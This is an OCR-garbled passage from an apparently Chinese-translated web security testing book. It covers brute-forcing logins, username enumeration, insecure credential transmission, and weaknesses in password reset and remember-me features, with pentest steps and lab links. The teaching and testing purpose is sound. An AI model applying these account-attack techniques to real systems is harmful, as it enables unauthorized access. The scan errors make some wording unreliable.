根据 所 获得 的 任何 有 关 密 码 强 上 度 规则 的 信息 对 上 述 列表 加 以 修改 ， 
以 避免 进行 多 余 测 试 。 

(8) 使 用 这 些 用 户 名 和 密码 的 各 种 排列 组 合 ， 通 过 适当 的 工 
有 具 或 定制 脚本 迅速 生成 登录 请 求 。 监 控 服 务 器 响应 以 确定 成 功 的 登 
录 尝 试 。 我 们 将 在 第 14 章 详细 说 明 使 用 自动 化 方法 实施 定制 攻击 的 
各 种 技巧 和 工具 。 

(9) 如 果 一 次 针对 几 个 用 户 名 ， 通 常 最 好 以 广度 优先 
(breadth-first) 而 非 深度 优先 《〈depth-first) 的 方式 实施 这 种 蛮 力 攻 
击 。 这 包括 循环 使 用 一 组 密码 (从 最 常用 的 密码 开始 ) 并 轮流 对 每 
个 用 户 名 使 用 每 一 个 密码 。 这 种 方法 有 两 方面 的 好 处 : 首先 ， 可 以 
更 加 迅速 地 确定 使 用 常用 密码 的 账户 ， 其 次 ， 这 样 做 可 以 降低 触发 
任何 账户 锁定 防御 的 可 能 性 ， 因 为 在 使 用 同一 个 账户 进行 连续 登录 
之 间 存 在 时 间 延 迟 。 
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笑 试 访问 
http://mdsec.net/auth/16/ 
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http://mdsec.net/auth/46/ 
http://mdsec.net/auth/49/ 





一 个 典型 的 登录 表单 要 求 用 户 输入 两 组 信息 (用 户 名 和 和 密码) ， 而 
另外 一 些 应 用 程序 则 需要 更 多 信息 〈 如 出 生日 期 、 纪 念 地 或 PIN 号 
码 ) 。 

如 果 登 录 尝 试 失败 ， 当然 可 恨 得 出 纸 论 ; 至 少 有 一 组 信息 出 错 。 但 
是 如 朱 应 用 程序 通 明知 是 哪 一 组 信息 无 效 ， 就 可 以 利用 它 显 车 降 低 登 录 
机 制 的 防御 效能 

在 最 简单 的 情况 下 ， 如 果 只 需要 用 户 名 和 密码 登录 ， 应 用 程序 可 能 
会 通过 指出 失败 的 原因 (用户 名 无 效 或 密码 错误 ) 来 响应 失败 的 登录 党 
试 ， 如 图 6-3 所 示 。 











Username: dəf Username: zzz 
Password: Login Password: Login 
Password is incorrect. User is not recognised. 
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不 隐藏 用 户 名 ) o (Axe, WRU ae Bes a EA AKHA, ME 
可 能 在 有 限 的 时 间 内 、 运 用 一 定 的 技能 、 付 出 一 定 的 精力 攻破 应 用 程 
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并 将 枚 举 出 的 用 户 名 列表 作为 随后 各 种 攻击 的 基础 ， 包 括 密 码 猜 
攻击 用 户 数据 或 会 话 ， 或 者 社会 工程 由 。 

除 主要 的 登录 功能 外 ， 还 可 以 对 验证 机 制 的 其 他 组 件 进行 用 户 名 枚 
理论 上 ， 需 要 提交 真实 或 潜在 用 户 名 的 任何 功能 都 可 用 于 这 一 目 
例如 ， 通 第 都 可 以 对 用 户 注 册 功 能 进行 用 户 名 枚 举 。 如 果 应 用 程序 





允许 新 用 户 注册 并 指定 他 们 目 己 的 用 户 名 ， 由 于 应 用 程序 需要 防止 注册 








重复 用 户 名 ， 在 这 种 情况 下 ， 几 乎 不 可 能 阻止 用 户 名 枚 举 攻 击 。 如 本 章 
后 面部 分 所 述 ， 有 时 也 可 以 对 密码 修改 或 筷 记 密码 功能 进行 用 户 名 枚 
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=> 注解 许多 验证 机 制 以 隐 含 或 明确 的 方式 提示 用 户 名 。 根 
据 设 计 常 识 ，Web 邮 件 账 户 的 用 户 名 通常 为 电子 邮件 地 址 。 许 多 其 
他 站 点 在 应 用 程序 中 透露 用 户 名 ， 或 者 允许 使 用 可 轻易 猜测 出 的 用 
户 名 (如 user1842，User1843 等 ) ， 并 未 考虑 攻击 者 会 对 其 加 以 利 
用 的 情况 。 


在 更 复杂 的 登录 机 制 中 ， 应 用 程序 要 求 用 户 提交 儿 组 信息 ， 或 者 完 








成 几 个 步骤 。 这 时 ， 详 细 的 失败 消 妃 或 差 开 点 可 帮助 攻击 者 轮流 针对 登 
录 过 程 的 每 个 阶段 发 动 攻击 ， 提 高 其 获得 未 授权 访问 的 可 能 性 。 











BE 
wg 
=> TERR 这 种 漏洞 可 能 会 以 更 隐 含 的 形式 出 现 。 即 使 啊 应 有 
效 和 无 效用 户 名 的 错误 消息 表面 看 来 完全 相同 ， 它 们 之 间 仍 然 存在 
细微 的 差别 ， 可 用 于 枚 举 有 效 的 用 户 名 。 人 例如， 如果 应 用 程序 中 的 
多 条 代码 路 径 返 回 “ 相 同 的 ?失败 消息 ， 这 些 消 息 之 间 仍 然 可 能 存在 
细小 的 排版 和 差异。 有些 时 候 ， 应 用 程序 响应 在 屏幕 上 显示 的 内 容 完 
全 相同 ， 但 其 HTML 源 代码 可 能 隐藏 着 细微 的 区 别 ， 如 注释 或 布局 
方面 的 不 同 。 如 果 无 法 轻易 枚 举 出 有 效 的 用 户 名 ， 应 当 仔细 比较 应 
用 程序 对 有 效 和 无 效用 户 名 作出 的 啊 应 。 

可 以 使 用 Burp Suite 中 的 “比较 ”(Comparer) 工具 上 自动 分 析 并 突 
出 显示 两 个 应 用 程序 响应 之 间 的 差异 ， 如 图 6-4 所 示 。 这 有 助 于 迅 
速 硝 定 有 效 的 用 户 名 是 侣 会 导 八 应 用 程序 的 明 应 出 现任 何 系统 性 的 


差异 。 
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渗透 测试 步 又 


(1) 如 果 已 经 知道 一 个 有 效 的 用 户 名 例如 一 个 受 控制 的 账 
户 )， 使 用 这 个 用 户 名 和 一 个 错误 的 密码 进行 一 次 登录 ， 然 后 使 用 
一 个 完全 随机 的 用 户 名 进行 另 一 次 登录 。 

(2) 记录 服务 器 啊 应 两 次 登录 笠 试 的 每 一 个 细节 ， 包 括 状 态 
码 、 任 何 重 定向 、 屏 幕 上 显示 的 信息 以 及 任何 隐藏 在 HIML 页 面 中 
的 差异 。 使 用 拦截 代理 服务 器 保存 服务 器 上 来 回流 量 的 完整 历史 记 


Ko 
7 (3) 努力 找 出 服务 咒 啊 应 两 次 登录 答 试 的 任何 明显 或 细微 的 


天 天 

(4) 如 果 无 法 发 现任 何 差 异 ， 在 应 用 程序 中 任何 提交 用 户 名 
的 地 方 ( 例 如 自我 注册 、 密 码 修 改 与 态 记 密码 功能 ) 重复 上 述 操 
VE 


(5) 如 果 发 现 服务 器 啊 应 有 效 和 无 效用 户 名 之 间 的 差异 ， 收 
集 一 个 常见 用 户 名 列表 并 使 用 一 个 定制 脚本 或 自动 工具 迅速 提交 每 
人 
AE). 3 

(6) 开始 枚 举 操作 之 前 ， 请 确定 应 用 程序 是 否 在 登录 党 试 失 
败 次 数 达 到 一 定数 目 后 执行 账户 锁定 〈 请 参 疯 6.2.2 节 ) 。 如 果 应 用 
程序 执行 账户 锁定 ， 最 好 在 设计 枚 举 攻击 时 记 住 这 一 点 。 例 如 ， 如 
果 应 用 程序 只 允许 登录 某 个 账户 时 失败 3 次 ， 可 能 就 会 在 使 用 通过 
上 自动 枚 举 发 现 的 每 个 用 户 名 登录 时 “ 沪 费 ”一 次 登录 机 会 。 因 此 ， 当 
进行 枚 举 攻击 时 ， 不 要 在 每 次 登录 时 提交 完全 不 合理 的 密码 ， 而 是 
提交 第 见 的 密码 ， 如 password1l 或 以 用 户 名 为 密码 。 如 果 应 用 程序 
执行 脆弱 的 密码 强度 规则 ， 在 枚 举 操作 过 程 中 执行 的 一 些 登 录 尝 试 
就 很 可 能 会 取得 成 功 ， 有 些 情况 下 还 可 能 同时 查 明 用 户 名 和 和 密码。 
要 以 用 户 名 设置 密码 字段 ， 可 以 使 用 Burp Intrude 冲 的 “ 破 城 
oe ae ram) 攻击 模式 ， 在 登录 请 求 的 几 个 位 置 插入 相同 的 
效 载 傈 。 


即使 应 用 程序 对 包含 有 效 与 无 效用 户 名 登录 答 试 的 啊 应 完全 相同 ， 





















































我 们 仍然 可 以 根据 应 用 程序 响应 登录 请 求 的 时 间 枚 举 出 用 户 名 。 应 用 程 
序 通 常 依据 登录 请 求 是 否 包 含有 效用 户 名 ， 对 其 进行 截然 不 同 的 后 端 处 
理 。 例 如 ， 如 果 登 录 请 求 中 包含 一 个 有 效 的 用 户 名 ， 应 用 程序 可 能 会 从 
后 端 数据 库 中 获取 用 户 资料 ， 对 这 些 资料 进行 各 种 处 理 〈 如 检查 账户 是 
否 到 期 ) ， 然 后 确认 密码 〈 可 能 使 用 一 个 资源 密集 型 散 列 算法 ) ， 如 果 
密码 错误 返回 一 条 常规 消息 。 仪 仅 使 用 浏览 器 可 能 无 法 检测 出 应 用 程序 
处 理 两 个 请 求 之 间 的 时 间 差 异 ， 但 自动 工具 能 够 区 分 这 种 差异 。 即 使 这 
种 操作 会 产生 大 量 错误 警报 ， 但 100 个 用 户 名 约 50% 的 有 效率 仍然 要 强 
于 10 000 个 用 户 名 仅 0.5% 的 有 效率 。 第 15 章 将 详细 讨论 如 何 检测 并 利用 
这 种 时 间 差 异 从 应 用 程序 中 提取 信息 。 




















Vo ”提示 除 登 录 功 能 外 ， 我 们 还 可 以 从 其 他 地 方 获取 有 效 的 
用 户 名 。 检 碍 在 应 用 程序 解析 过 程 中 《请 参阅 第 4 章 了 解 相关 入 
容 ) 发 现 的 所 有 源 代 码 注释 ， 确 定 所 有 明显 的 用 户 名 。 开 发 者 或 组 
织 内 部 内 其 他 人 员 的 电子 邮件 地 址 都 可 能 为 有 效 的 用 户 名 ; 任何 可 
访问 的 日 志 功 能 也 可 能 透露 用 户 名 。 











A yn.) 

笑 试 访问 
http://mdsec.net/auth/53/ 
http://mdsec.net/auth/59/ 
http://mdsec.net/auth/70/ 


http://mdsec.net/auth/81/ 
http: //mdsec.net/auth/167/ 


6.2.4 ”证书 传输 易 受 了 


如 果 应 用 程序 使 用 非 加 密 的 HTTP 连 接 传 输 登 录 证 书 ， 处 于 网 络 适 
| 
能 VE : 

口 用 户 的 本 地 网 络 中 ; 

a H ITXI]; 

口 用 户 的 ISP 内 ; 

Co 因特网 骨干 网 上 ; 

口 托管 应 用 程序 的 ISP 内 ; 
口 管理 应 用 程序 的 IT 部 门 内 。 











Ey 


> ”注解 上述 任 何 一 个 位 置 可 能 由 授权 用 户 占 用 ， 也 可 能 
通过 其 他 方法 攻破 相关 基础 架构 的 外 部 攻击 者 占用 。 即 使 某 一 特定 
eee et 最 好 还 是 使 用 安全 的 传输 机 制 传送 敏感 数 


即使 是 通过 HTTPS 登 录 ， 如 果 应 用 程序 处 理 证 书 的 方式 并 不 安全 ， 
证 书 仍 有 可 能 被 泄露 给 未 授权 方 。 

口 如 果 以 查询 字符 串 参 数 、 而 不 是 在 POST 请 求 主体 中 传送 证 书 ， 
许多 地 方 都 可 能 记录 这 些 证 书 ， 例 如 用 户 的 浏览 器 历史 记录 中 、Web 服 


务 器 日 志 内 以 及 主机 基础 架构 采用 的 任何 反 向 代理 中 。 如 果 攻 击 者 成 功 
en ey 
问 权 限 。 

口 虽然 大 多 数 Web 应 用 程序 确实 使 用 POST 请 求 主体 提交 HTML 登 录 
表单 ， 但 令 人 奇怪 的 是 ， 应 用 程序 常常 通过 重 定向 到 一 个 不 同 的 UREL 来 
处 理 登 录 请 求 ， 而 以 查询 字符 串 参数 的 形式 提交 证 书 。 我 们 并 不 清楚 应 
用 程序 开发 者 为 何 采 用 这 种 方法 ， 但 以 连接 一 个 URL 的 302 重 定 同 执行 
请 求 ， 比 使 用 另 一 个 通过 JavaScript 提 交 的 HTML 表 单 提 出 POST 请 求 要 
容易 得 多 。 

口 Web 应 用 程序 有 时 将 用 户 证 书 保存 在 cookie 中 ， 通 常 是 为 了 执行 
设计 不 佳 的 登录 、 密 码 修改 、“ 记 住 我 ”等 机 制 。 攻 击 者 通过 攻击 用 户 
cookie 即 可 获取 这 些 证 书 。 如 果 cookie 相 对 安全 可 靠 ， 可 通过 访问 客户 
端的 本 地 文件 系统 获得 它们 。 即 使 证 书 被 加 密 ， 攻 击 者 仍然 不 需要 用 户 
证 书 就 可 以 通过 重新 传送 cookie 实 施 登 录 。 第 12 章 和 第 13 章 将 描述 攻击 
者 如 何 通 过 各 种 方法 获取 其 他 用 户 的 cookie。 

许多 应 用 程序 对 应 用 程序 中 未 经 验证 的 区 域 使 用 HTTP， 而 在 登录 
时 转 而 使 用 HTTPS。 如 果 是 这 样 ， 应 在 癌 浏 览 器 加 载 登录 页 面 时 转换 到 
HTTPS， 使 得 用 户 能 够 在 输入 证 书 前 核实 页 面 是 否 真实 可 信 。 但 是 ， 一 
些 应 用 程序 通常 使 用 HTTP 加 载 登 录 页 面 ， 而 在 提交 证 书 时 才 转 换 到 
HTTPS。 这 样 做 是 不 安全 的 ， 因 为 用 户 不 能 核实 登录 页 面 的 真实 性 ， 因 
此 无 法 保证 安全 提交 证 书 。 那 么 ， 处 在 适当 位 置 的 攻击 者 就 可 以 拦截 并 
修改 登录 页 面 ， 更 改 登录 表单 的 目标 URL 以 使 用 HITP。 等 到 精明 的 用 
户 意 识 到 证 书 已 使 用 HTTP 提 交 时 ， 攻 击 者 已 成 功 获取 这 些 证 书 。 























渗透 测试 步 又 


Ee alt ool og Pee 
流量 。 

(2) 确定 在 来 回 方向 传输 证 书 的 每 一 种 情况 。 可 以 在 拦截 代 
理 服务 器 中 设置 拦截 规则 ， 标 记 包 含 特殊 字符 串 的 消息 《请 参阅 第 
20 章 了 解 相关 内 容 〉。 

(3) 如 果 发 现 通过 URL 碍 询 字 符 串 或 者 以 cookie 的 方式 提交 证 
书 ， 或 者 由 服务 器 向 客户 端 传输 证 书 的 任何 情况 ， 了 解 传输 的 一 切 
细节 并 设法 弄 清 应 用 程序 开发 者 这 样 做 的 目的 。 设 法 查 明 攻 击 者 干 
扰 应 用 程序 逻辑 以 获取 其 他 用 户 证 书 的 各 种 手段 。 

(4) 如 果 通 过 非 加 密 渠道 传输 任何 敏感 信息 ， 这 样 做 当然 容 
易 遭 受 攻击 。 

(5) 如 果 没 有 发 现 证 书 传输 不 安全 的 情况 ， 留 意 任 何 明显 被 
编码 或 模糊 处 理 的 数据 。 如 果 这 些 数据 中 包括 敏感 数据 ， 其 模糊 算 
法 可 能 遭受 逆向 工程 。 

(6) 如 果 使 用 HTTPS 提 交 证 书 ， 但 使 用 HTTP 加 载 登录 表单 ， 
那么 应 用 程序 就 容易 遭受 中 间 人 攻击 ， 攻 击 者 也 可 能 使 用 这 种 攻击 
手段 获取 证 书 。 














A yn.) 
笑 试 访问 
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6.2.5 ”密码 修改 功能 


令 人 奇怪 的 是 ， 许 多 Web 应 用 程序 并 不 允许 用 户 修改 其 密码 。 但 
是 ， 出 于 两 个 方面 的 原因 ， 精 心 设计 的 验证 机 制 需要 这 种 功能 。 

口 定 期 强制 修改 密码 可 降低 某 一 密码 成 为 密码 猜测 攻击 目标 的 可 能 
性 ， 同 时 降低 攻击 者 不 需要 检测 即 可 使 用 被 攻破 密码 的 可 能 性 ， 由 此 降 
低 密 码 被 攻击 的 概率 。 

口 怀疑 自己 的 密码 已 被 攻破 的 用 户 需 要 立即 修改 密码 ， 以 降低 未 授 
权 使 用 概率 。 虽 然 密码 修改 功能 是 一 个 高 效 验 证 机 制 的 必要 组 成 部 分 ， 
但 从 设计 来 看 ， 它 往往 易于 遭受 攻击 。 在 主要 登录 功能 中 特意 避免 的 漏 
洞 通常 在 密码 修改 功能 中 重复 出 现 。 许 多 Web 应 用 程序 的 密码 修改 功能 
ee 
RTF o 

口 提 供 详细 的 错误 消 轧 ， 说 明 被 请 求 的 用 户 名 是 否 有 效 。 

口 允许 攻击 者 无 限制 猜测 “ 现 有 密码 ”字段 。 

口 在 验证 现 有 密码 后 ， 仅 检查 “新 密码 ”与 “确认 新 密码 ”字段 的 值 是 
舍 相 同 ， 允 许 攻击 者 不 需 入 侵 即 可 成 功 查 明 现 有 密码 。 

典型 的 密码 修改 功能 通常 包含 一 个 相对 较 大 的 人 逻辑 判定 树 。 应 用 程 
序 需 要 确认 用 户 、 验 证 提供 的 现 有 密码 、 集 成 任何 账户 锁定 防御 、 对 所 
区 的 新 密码 进行 相互 比较 并 根据 密码 强度 规则 进行 比较 ， 以 及 以 适当 的 
方式 癌 用 户 返 回 任何 错误 条 件 。 为 此 ， 密 码 修改 功能 通常 包含 难以 察觉 
的 可 用 于 破坏 整个 机 制 的 逻辑 缺陷 。 


























渗透 测试 步 又 


(1) 确定 应 用 程序 中 的 所 有 密码 修改 功能 。 即 使 公布 的 内 容 
(published content) 中 没有 明确 的 密码 修改 功能 链接 ， 应 用 程序 仍 
然 可 能 实施 这 种 功能 。 我 们 已 在 第 4 章 中 说 明了 发 现 应 用 程序 中 隐 
HBL AS PLY o 

(2) 使 用 无 效 的 用 户 名 、 无 效 的 现 有 密码 及 不 匹配 的 “新 密 
人 码 ”? 和 “确认 新 密码 ” 值 同 密码 修改 功能 提交 各 种 请 求 。 

(3) 设法 确定 任何 可 用 于 用 户 名 枚 举 或 蛮 力 攻击 的 行为 《如 
6.2.2 节 和 6.2.3 节 所 述 ) 。 








YY ”提示 如 有 果 密 码 修改 表单 只 可 由 验证 用 户 访问 ， 且 其 中 并 
无 用 户 名 字段 ， 表 单 中 仍 有 可 能 包含 一 个 任意 用 户 名 。 表 单 可 能 将 
用 户 名 保存 在 一 个 可 被 轻易 修改 的 隐藏 字段 中 。 如 果 在 字段 中 没有 
发 现 用 户 名 ， 设 法 使 用 和 主 登 录 表单 中 相同 的 参数 提交 为 一 个 包含 
用 户 名 的 参数 。 这 种 技巧 有 时 可 成 功 履 盖 当 前 用 户 的 用 户 名 ， 使 攻 
击 者 能 够 癌 其 他 用 户 的 证 书 发 动 灾 力 攻击 ， 即 使 在 主 登录 页 面 不 可 
能 实施 这 种 攻击 。 








尝试 访问 


http://mdsec.net/auth/104/ 
http://mdsec.net/auth/117/ 
http://mdsec.net/auth/120/ 
http://mdsec.net/auth/125/ 
http://mdsec.net/auth/129/ 
http://mdsec.net/auth/135/ 


6.2.6 ”不 记 和 密码 功能 


与 密码 修改 功能 一 样 ， 重 新 获得 不 记 密码 的 机 制 常 第 会 引入 已 在 主 
要 登录 功能 中 避免 的 问题 ， 如 用 户 名 枚 举 。 

除 这 种 缺陷 外 ， 忘 记 密 码 功能 设计 方面 的 缺点 往往 使 它 成 为 应 用 程 
序 总 体验 证 逻辑 中 最 薄弱 的 环节 。 下 面 介绍 几 种 常见 的 设计 缺点 。 

口 态 记 密码 功能 常常 同 用 户 提 出 一 个 次 要 质询 以 代 瞧 主要 登录 功 
能 ， 如 图 6-5 所 示 。 与 试图 猜测 用 户 密码 相 比 ， 啊 应 这 种 质询 对 攻击 者 
来 说 更 容易 一 些 。 母 亲 的 娘家 姓 、 纪 念 日 、 最 喜欢 的 颜色 等 问题 的 答案 
要 比 可 能 的 密码 的 数量 少 得 多 。 而 且 ， 这 些 问 题 的 答案 常常 隐藏 在 公开 
的 信息 中 ， 意 志 坚 定 的 攻击 者 无 须 花 费 多 大 精力 即 可 找到 答案 。 














Forgot Your Password or User ID? 


er ld: Tim 


era vista 


Enter the answer to your secret question: 


CONTINUE 


图 6-5 ”账户 恢复 功能 中 的 次 要 质询 








许多 时 候 ， 应 用 程序 允许 用 户 在 注册 阶段 设 定 他 们 自己 的 密码 
恢复 质询 与 啊 应 ， 而 用 户 很 有 可 能 会 设置 极其 不 安全 的 质询 ， 
这 也 许 是 因为 用 户 错误 地 认为 应 用 程序 仅 向 他 们 自己 提出 这 些 
质询 ， 例 如 :“ 我 拥有 一 只 船 吗 ? ”在 这 种 情况 下 ， 硕 望 获得 访 
问 权 的 攻击 者 可 使 用 上 自动 攻击 手段 表 历 一 组 已 枚 举 的 或 常见 的 
用 户 名 ， 记 录 所 有 密码 恢复 质询 ， 并 选择 那些 看 似 最 容易 猜测 
出 的 质询 发 动 攻击 。《 请 参阅 第 14 章 了 解 有 关 如 何在 上 自 定 义 攻 
击 中 获取 这 类 数据 的 技巧 。) 

口 与 密码 修改 功能 一 样 ， 即 使 应 用 程序 开发 者 在 主 登 录 页 面 阻止 攻 
击 者 问 密 码 恢复 质询 的 啊 应 发 动 灾 力 攻击 ， 他 们 也 往往 会 在 瑟 记 密码 功 
能 中 忽略 这 种 攻击 的 可 能 性 。 如 果 应 用 程序 允许 无 限制 地 回答 密码 恢复 
质询 ， 那 么 意志 坚定 的 攻击 者 束 很 可 能 会 攻破 这 个 密码 。 

口 一 些 应 用 程序 使 用 一 个 简单 的 密码 “暗示”( 可 由 用 户 在 注册 阶段 
配置 ) 代 蔡 恢复 质询 。 由 于 用 户 错误 地 认为 只 有 自己 才 会 看 到 这 些 暗 
示 ， 他 们 往往 设置 非常 明显 的 暗示 ， 甚 至 是 和 密码 完全 相同 的 上 暗示。 此 
外 ， 拥 有 一 组 第 见 或 已 枚 举 出 的 用 户 名 的 攻击 者 可 轻易 获取 大 量 密码 暗 
示 ， 然 后 开始 实施 猜测 。 

口 在 用 户 正 确 啊 应 一 个 质询 后 ， 应 用 程序 即 允 许 用 户 重 新 控制 他 们 
的 账户 ， 这 种 机 制 非常 容易 遭受 攻击 。 执 行 这 种 机 制 的 一 个 相对 安全 的 
方法 是 问 用 户 在 注册 阶段 提供 的 电子 邮件 地 址 发 送 一 个 唯一 的 、 无 法 猜 
测 的 、 存 在 时 间 限 制 的 恢复 URL。 用 户 在 几 分 钟 内 访问 这 个 URL 即 可 设 
置 一 个 新 密码 。 但 是 ， 我 们 常常 会 过 到 其 他 一 些 在 设计 上 存在 缺陷 的 账 
户 恢复 机 制 。 



























































m EG) FABER CEA ST Me Do 7S Ji Ve Js BY Yr] 
透露 现 有 与 遗 态 的 密码 ， 使 攻击 者 能 够 无 限制 地 使 用 
该 账户， 而 不 会 被 账户 所 有 者 检测 出 来 。 即 使 账 尸 所 
有 者 随后 修改 被 攻破 的 密码 ， 攻 击 者 只 需 重 新 回答 相 
同 的 质询 即 可 获得 新 密码 。 

一些 应 用 程序 在 用 户 成 功 完成 一 个 质询 后 ， 立 即 
让 其 进入 一 个 不 需 验 证 的 会 话 。 这 同样 使 攻击 者 可 无 
限制 地 使 用 该 账户 ， 而 不 会 被 账户 所 有 者 检测 出 来 ， 
甚至 不 需要 知道 用 户 的 密码 。 

一些 应 用 程序 采用 发 送 一 个 唯一 恢复 URL 的 机 

制 ， 但 却 将 这 个 URL 发 送 至 用 户 在 完成 质询 时 指定 的 
电子 邮件 地 址 中 。 除 能 够 记录 攻击 者 所 使 用 的 电子 邮 
TEES R E 




















YV 提示 即使 应 用 程序 并 未 提供 一 个 在 屏幕 上 显示 的 字段 
要 求 用 户 输入 接收 恢复 URL 的 电子 邮件 地 址 ， 它 仍 有 可 能 通过 一 个 
隐藏 表单 字段 或 cookie 传 送 这 个 地 址 。 攻 击 者 因此 获得 双重 机 会 : 
一 方面 ， 可 以 发 现 所 攻破 的 用 户 的 电子 邮件 地 址 ， 另 一 方面 ， 可 对 
这 个 地 址 进行 修改 ， 用 自选 的 地 址 接收 恢复 URL。 


m 一 些 应 用 程序 允许 用 户 在 成 功 完成 一 个 质询 后 直 
接 重 新 设置 密码 ， 并 且 不 同 用 户 发 送 任 何 电 子 邮 件 通 
知 。 这 意味 着 直到 所 有 者 碰巧 再 次 登录 时 才 会 注意 到 
账户 极 攻 击 者 攻破 ; 而且， 如 果 所 有 者 认为 目 己 一 定 
是 坏 记 了 密码 ， 于 是 用 上 述 方法 重新 设置 密码 ， 他 可 
能 仍然 无 法 发 沉 账 户 已 被 攻破 。 那 么 ， 只 是 和 希望 偶尔 
访问 应 用 程序 的 攻击 者 束 可 以 在 一 段 时 间 攻 破 一 个 用 
户 账户 ， 在 另 一 段 时 间 攻 破 另 一 个 不 同 用 己 的 账户 ， 
从 而 继续 无 限制 地 使 用 该 应 用 程序 。 

















渗透 测试 步 又 


(1) 确定 应 用 程序 中 的 所 有 忘记 和 密码 功能 。 即 使 公布 的 内 容 
中 没有 明确 的 忘记 和 突 码 功 能 链接 ， 应 用 程序 仍然 可 能 实施 这 种 功能 
(请 参阅 第 4 章 了 解 相 关内 容 〉。 

(2) 使 用 受 控制 的 账 尸 执行 一 次 完整 的 密码 恢复 过 程 ， 了 解 
未 记 密 人 码 功 能 的 工作 机 制 。 

(3) 如 果 恢 复 机 制 使 用 质询 ， 确 定 用 户 是 否 能 够 设 定 或 选择 
他 们 自己 的 质询 与 啊 应 。 如 果 用 户 可 设 定 或 选择 自己 的 质询 与 啊 
应 ， 使 用 一 组 已 枚 举 的 或 常见 的 用 户 名 获取 一 些 质 询 ， 并 对 其 进行 
分 析 ， 找 出 任何 非常 容易 猜测 出 啊 应 的 质询 。 

(4) 如 果 恢 复 机 制 使 用 密码 “暗示 ”， 采 取 和 上 个 步骤 相同 的 


(5) 设法 确定 筷 记 密码 机 制 中 任何 可 用 于 用 户 名 枚 举 或 蛮 力 
攻击 的 行为 《详情 请 参阅 上 文 ) 。 

C6) 如 果 应 用 程序 在 忘记 密码 请 求 的 响应 中 生成 一 封包 含 恢 
复 URL 的 电子 邮件 ， 获 取 大 量 这 类 URL， 并 试图 确定 任何 可 帮助 预 
测 向 其 他 用 户 发 布 URL 的 模式 。 请 使 用 和 分 析 会 话 令 牌 以 实现 预测 
相同 的 技巧 《请 参阅 第 7 章 了 解 相关 内 容 ) 。 



































A yn.) 
笑 试 访问 
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6.2.7 “ 记 住 我 2 功能 


为 方便 用 户 ， 避免 他 们 每 次 在 一 全 特定 的 计算 机 上 使 用 应 用 程序 时 
第 要 章 复 输入 用 户 名 和 和 窜 人 码 ， 应 用 程序 通 第 执行 “ 记 住 我 * 功 能。 这些 功 
i 能 在 设计 上 并 不 安全 ， 致 使 用 户 易于 遭受 本 地 和 其 他 计算 机 用 户 的 攻 


口 一 些 “ 记 住 我 ”功能 通过 一 个 简单 的 cookie 执 行 ， 如 
ea =pet erwiener meen 6) 。 回 初始 应 用 程序 页 面 提交 这 个 
cookie 时 ， 应 用 程序 信任 该 cookie， 认为 其 属于 通过 验证 的 用 户 ， 并 为 
该 用 户 建 立 一 个 应 用 程序 会 话 ， 从 而 避 开 登录 过 程 。 攻 击 者 可 以 使 用 一 
组 常见 或 已 枚 举 出 的 用 户 名 ， 不 需要 任何 验证 即 可 完全 访问 应 用 程序 。 





burp suite professional 


epeater 





图 6-6 一 个 易 受 攻击 的 “ 记 住 我 ”功能 


口 一 些 “ 记 住 我 ”功能 设置 一 个 cookie， 其 中 并 不 包含 用 户 名 ， 而 是 
使 用 一 个 持久 会 话 标识 符 ， 例 如 RememberUser=1328。 向 登录 页 面 提交 
这 个 标识 符 时 ， 应 用 程序 查询 与 其 相关 的 用 户 ， 并 为 该 用 户 建立 一 个 应 
用 程序 会 话 。 和 普通 会 话 令 牌 一 样 ， 如 果 可 预测 或 推断 出 其 他 用 户 的 会 
话 标识 符 ， 攻 击 者 就 可 以 遇 历 大 量 可 能 的 标识 符 ， 找 到 与 应 用 程序 用 户 
相关 联 的 标识 符 ， 不 经 验证 即 可 访问 他 们 的 账户 。 请 参阅 第 7 章 了 解 实 
施 这 种 攻击 的 有 关 技 巧 。 

口 即 使 cookie 中 保存 的 用 于 重新 识别 用 户 的 信息 得 到 适当 保护 《〈 如 
被 加 密 ) ， 以 防止 其 他 用 户 对 此 进行 推 呆 或 猜测 ， 但 攻击 者 通过 跨 站 点 
脚本 之 类 的 漏洞 或 本 地 访问 用 户 的 计算 机 依然 可 以 轻易 获得 这 些 信 息 

《请 参阅 第 12 章 了 解 相关 内 容 ) o 














渗透 测试 步 又 


(1) 激活 所 有 “ 记 住 我 ”功能 ， 确 定 应 用 程序 是 否 完 全 “ 记 
住 ? 用 户 名 和 密码 ， 还 是 仅 记 住 用 户 名 ， 仍 然 要求 用 户 在 随后 的 访 
ae 如 果 采 用 后 一 种 设置 ， 该 功能 就 不 大 可 能 存在 安全 
漏洞 。 

(2) 仔细 检查 应 用 程序 设 定 的 所 有 持久 性 cookie， 以 及 其 他 本 
地 存储 机 制 中 的 持久 性 数据 ， 如 下 的 userData、Seilverlight 的 隔离 存 
储 、Flash 的 本 地 共享 对 象 。 寻 找 其 中 保存 的 任何 明确 标识 出 用 户 或 
明显 包含 可 预测 的 用 户 标 识 符 的 数据 。 

(3) 即使 其 中 保存 的 数据 经 过 严密 编码 或 模糊 处 理 ， 仔 细 分 
析 这 些 数据 ， 并 比较 “ 记 住 ” 几 个 非常 类 似 的 用 户 名 或 密码 的 结果 ， 
找到 任何 可 对 原始 数据 进行 逆 同 工程 的 机 会 。 在 这 里 可 使 用 将 在 第 
7 章 描述 的 用 于 检测 会 话 令 牌 意义 和 模式 的 相同 技巧 。 

(4) 试图 修改 持久 性 cookie 的 内 容 ， 并 设法 让 应 用 程序 确信 : 
男 一 名 用 户 已 经 将 其 资料 保存 在 你 的 计算 机 中 。 








尝试 访问 
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6.2.8 3 伪装 功能 


一 些 应 用 程序 允许 特权 用 户 伪装 成 其 他 用 户 ， 以 在 该 用 户 的 权限 下 
访问 数据 和 执行 操作 。 例 如 ， 一 些 银行 应 用 程序 允许 服务 台 操 作 员 口头 
验证 一 名 电话 用 户 ， 然 后 将 银行 的 应 用 程序 会 话 转换 到 该 用 户 的 权限 
下 ， 以 为 其 提供 帮助 。 

伪装 功能 一 般 存 在 各 种 设计 缺陷 。 

口 盆 疙 功能 可 以 通过 “隐藏 * 功 能 的 形式 执行 ， 不 受 常规 访问 控制 管 
理 。 例 如 ， 任 何 知道 或 猜测 出 URL/admin/ImpersonateUser.jsp 的 人 都 能 
够 利用 该 功能 伪装 成 任何 其 他 用 户 〈( 请 参阅 第 8 章 了 解 相关 内 容 〉。 

口 当 判 定 用 户 是 否 进 行 伪装 时 ， 应 用 程序 可 能 会 信任 由 用 户 控 制 的 
数据 。 例 如 ， 除 有 效 会 话 令 牌 外 ， 用 户 可 能 还 会 提交 一 个 指定 其 会 话 当 
